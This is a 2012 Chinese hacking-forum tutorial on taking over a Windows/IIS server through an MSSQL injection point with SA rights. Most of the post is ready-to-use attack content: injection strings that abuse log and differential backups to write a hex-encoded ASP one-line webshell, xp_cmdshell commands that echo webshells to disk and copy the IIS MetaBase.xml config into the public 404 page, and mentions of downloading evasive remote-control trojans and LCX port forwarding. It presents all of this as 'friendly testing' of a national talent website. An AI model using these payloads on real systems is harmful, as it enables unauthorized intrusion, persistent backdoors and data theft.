中国网络渗透测试联盟
标题:
sa权限的教程.
[打印本页]
作者:
admin
时间:
2012-9-15 14:30
标题:
sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security Team -- 打造90后网安精英团队 ———————————————————————————————
' }6 n+ f& f; y6 Y. A8 X, J+ a
2 Q1 V# ~9 \; E' A& [. r
& ~. ~: i, F7 n) k
欢迎高手访问指导,欢迎新手朋友交流学习。
) }' w; I/ J" K, r3 |% F0 v) o& [: V) m
5 j8 x- m: @6 w( X5 B& a# ]
3 W' }3 p8 C% F
7 l6 _# j3 k- i1 ~1 G3 \
论坛:
http://www.90team.net/
9 `: @+ F+ `7 y3 f5 M$ K; B% p
^3 G# `6 m. v5 D5 }: @, T( U% [
1 G: x% w3 A2 ]
4 ]; k# [* \; K3 {+ S0 }
友情检测国家人才网
6 b7 c+ v. B" G; I7 E$ c8 k
! P7 D& B9 `* Y4 \' X
T7 ^. [ r. W, K* G& ]6 z
内容:MSSQL注入SA权限不显错模式下的入侵
- {) G& L. c7 E
+ \1 A% R+ Q {, Q. Y6 @ h
I# C+ q3 R) K" J4 K; o" I
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
" d5 B1 J! F3 \1 S" O, ^( f& {
% z" \7 e3 F1 M% E% T2 h3 m
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
- m+ f, ?+ ?3 v/ l/ M
4 u7 ~4 ]; s' ~; y) Q
, i3 N( U1 ]4 M' }
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
" j" ~ g* K d$ J7 `
% v" b1 ~+ o# w5 s4 a+ `# J" R6 Y
思路:
( }6 l- u9 w, ~
- b- H3 C! @2 j X% [) b
首先:
* [: O$ r* d A9 P9 l# C
1 w/ |, G7 z' I' _3 h
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
/ ^! \+ u: b" h7 Z4 @
$ D/ w0 @9 Z* n2 O
1.日志备份获得Webshell
, c `: J2 N) Y- s
: W( ~( C y1 C
2.数据库差异备份获得Webshell
# E& V; S- ^' ?" |3 y: b
& G; n) | k+ \$ t: S
4.直接下载免杀远控木马。
9 X+ H& |; h, n; q' y) I
3 F. V2 D7 B- U
5.直接下载LCX将服务器端口转发出来
' B8 N5 q8 H* _9 l( D
' o3 y/ x3 u' m, M' J$ T! D: h
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
( m( g: y# x4 k7 y! a$ w, h
, C T' y2 U9 T! X
9 j+ N$ u1 p" E' o+ E" [) Y5 K8 y% x
. p" w* y0 x: S# K
在这里我就不浪费大家时间了,我已经测试过 日志备份和 数据库差异备份 都没有成功 我就不演示了。 直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
2 x: r9 F" D$ X
: O$ ?7 r4 U. _# B
我直接演示后面一个方法
1 C! T$ _+ a9 n9 B: d6 c; z# C
# A* Q6 E% r* }% a8 N
. e$ R2 ]; {6 C# Z0 n6 ^' D
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
! N* m, m; @* J% {' w( |0 I; C
$ F: [$ I7 e$ |0 i3 A) o
! G2 u( z+ Q0 d4 d0 S9 f \: _
, l5 y, k6 Y8 `5 K6 L h0 \
& g/ y9 C* `& P: c" ]. p* M% h* V6 H
◆日志备份:
8 j" Q0 j# Q1 ]* a
' y2 {2 Q6 X1 ^$ ~$ |
0 D& m4 e3 D6 s, W, @
1. 进行初始备份
3 N$ a/ p e, K
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
6 ~# e* B) c- E. K( w: L
: O- u. f* e1 n* h5 Q- x7 \& ^
2. 插入数据
. H) n7 j5 a' ]/ r% f# h9 u8 L! d" K6 E
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
* ~4 G1 [4 l4 I( w# {! g( f
5 ~* `2 ^3 P( U) J% I' l8 n- p$ M/ S
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
2 b7 l; r' }& F% |% j9 H
b, f* z9 t2 w
3. 备份并获得文件,删除临时表
; t6 `2 z3 l4 m1 p5 C/ g
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
: M. ?" S% d8 \& j
: |/ Q7 k) Y( w% g3 S8 j
$ }# I% Z7 {; Q6 x
& I6 K i9 b! w4 K- |" |7 H9 V
◆数据库差异备份
' x4 | \/ W, N
3 n6 k+ K. G* S; G" K9 R
(1. 进行差异备份准备工作
# o# l8 J' z6 p# g" e
' {; u9 y7 l8 f
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
( `; X* k, r# m# a7 J0 K- \
4 a. V: Z, @3 w+ j- J& x
上面的 0x633A5C746573742E617370 是 c:\test.asp 路径转换后的16进制编码
/ `+ d: }# _3 B. h( w$ Y1 A
+ j! y* W |# o& l" m* k8 r
/ y) { t+ q- ^
(2. 将数据写入到数据库
1 f b8 P4 T6 @+ Q) M
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
3 f% F5 C! t: B7 m+ ~# @3 J( Q) l) o
6 @- i4 g4 G2 z6 t
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
S$ w! R/ P F' J6 L g) O
! m! W6 |0 Z7 `+ W
3. 备份数据库并清理临时文件
1 U2 Y, g3 ]2 B; C' t
9 W. @& \) A2 g! K( W/ O
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
& [; Q8 O- ?! U; F2 ?6 @( D3 D0 c
F! L3 N' C7 v* {( a, I
0x633A5C746573742E617370 为 c:\test.asp 删除临时文件
; k, b. o, |2 \9 U9 G+ d4 a
. t6 u7 b) |: R) v+ w7 g
' G5 X+ C, ^$ R8 I& n3 c8 ~
2 [ C7 V7 T& K6 U5 O+ T3 e: n
用^转义字符来写ASP(一句话木马)文件的方法:
- F3 h! { ]: _2 g2 H; A5 R
/ D; a% j1 n8 ^: ~1 U% ~1 ^/ A
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
2 i( U. e; {* H) r# \
; ?( O5 [. g) G* o
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
4 U& X3 U# y% x. z/ k
+ q: y1 G3 ^% E0 ^5 { W- U
读取IIS配置信息获取web路径
1 O9 }9 t$ f5 w3 {5 k( j0 h/ a* x
0 U5 X1 h: {$ Y- m# A4 u' h
- A* {- g& |1 |. H2 O
注入点后面执行 ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
& j; k$ e! n8 j8 t; h4 U2 D+ h
4 b7 |% N9 i2 `6 E& k
执行命令
! ?0 K6 y% t, a U8 S
5 ]( m/ a, `2 X( \! a0 a
注入点后面执行 ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
) G7 z/ ~3 {4 D* V R! |
2 `. E6 b4 c3 q# I# ~
; y* R+ k6 D* S( h
) w, D" b8 [9 T% o
5 o& d- |0 e2 ]' D% ^; L1 u
0 {1 d, t% i) E
, @" Y7 U- {9 d* L. w/ p0 A
9 d% w/ p G' w( t' a
6 W: Q2 R* X5 T* ]4 A( c
$ _0 Y' R$ y7 C7 [
, Y1 o' P- o. w
5 f3 m, p, B4 r
7 u c$ W* k W7 w \' l- X+ X, i
2 {8 z7 f2 q7 ~! i- a, @) p1 G
0 e- [9 w2 i" G+ s+ Q
5 ]4 x, y0 X. Q4 P* a" x
% q4 h0 D- h) e5 _: @$ Y* l
7 j4 }/ h5 ]6 b: C- L) E2 g
* m& k5 z; D2 H. w% I) ~
: x" q* ~1 P3 X
; n& U: L0 q, H+ M+ S) B n1 N
3 c: a2 @* N' Q
* h1 \, [% b" M3 h' A! q
7 P" ~& y B6 c% o9 j; h
2 O" Z9 l* C' _. C* n
4 I# ~1 S' d/ ?: D- b3 r* q7 Q
: F6 e4 t, \# T8 X% t5 ~
) n, \0 ^; a( {& ?
; ?8 r% m. _* u1 v
2 J Q+ e* X7 n( N) W- _2 s( f
! h+ z4 d; O3 z/ F) e- g7 l6 O
& O% Y$ i9 J" ~7 x+ d5 o
% w2 [6 \2 t# J' r* V
- X" K/ f: b2 J
3 V( Z' y' L( P2 t
. m7 F, X& f0 b) B6 a
; B5 C! Z: n1 ]: _$ w% Y9 T
, L% p' T4 ^( ?* }, L2 |& T
/ Y' U& v- r' r$ B( O
1 N9 {7 `& b" g+ M. S8 X/ n) l
. Y; v' ^: I/ E, c: c5 e
2 z7 H7 N$ `6 e6 S
, K* ~+ l$ |6 I
8 V/ [* Z+ n" ~+ Z5 F5 Z
4 h$ \+ `# f$ X1 f* q& `$ l
! ^, Q0 n: ]# z* }
5 _9 I* C4 X/ c1 ~6 ]
/ j: z1 D9 M; l2 ^0 C
& ?8 I9 p) C3 n" y, w' r' Y
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2